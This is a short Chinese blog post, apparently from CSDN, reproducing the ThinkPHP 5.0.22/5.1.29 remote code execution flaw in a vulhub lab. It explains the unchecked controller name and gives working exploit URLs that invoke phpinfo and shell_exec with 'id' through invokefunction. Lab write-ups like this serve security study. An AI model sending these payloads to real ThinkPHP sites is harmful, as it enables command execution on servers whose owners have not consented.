vulhub中ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现

ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

1.环境启动后,访问http://your-ip:8080即可看到ThinkPHP默认启动页面。

2.直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo:

复制代码
http://192.168.188.139:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id
相关推荐
Andya_net1 小时前
网络安全 | 深入了解 X.509 证书及其应用
服务器·安全·web安全
Andya_net16 小时前
网络安全 | SSL/TLS 证书文件格式详解:PEM、CRT、CER、DER、PKI、PKCS12
安全·web安全·ssl
jieyu11191 天前
uploads-labs靶场通关(1)
web安全·文件上传漏洞·靶场通关
竹等寒1 天前
Linux-网络安全私房菜(二)
linux·服务器·web安全
white-persist1 天前
CSRF 漏洞全解析:从原理到实战
网络·python·安全·web安全·网络安全·系统安全·csrf
渗透测试老鸟-九青1 天前
网络安全之揭秘APT Discord C2 以及如何取证
安全·web安全·网络安全学习路线
key061 天前
大模型在网络安全领域的应用与评测
网络·人工智能·web安全
数字供应链安全产品选型2 天前
国家级!悬镜安全入选两项“网络安全国家标准应用实践案例”
人工智能·安全·web安全
鹿鸣天涯2 天前
商用密码应用安全性评估
网络·安全·web安全
jieyu11192 天前
xxe靶场通关
安全·web安全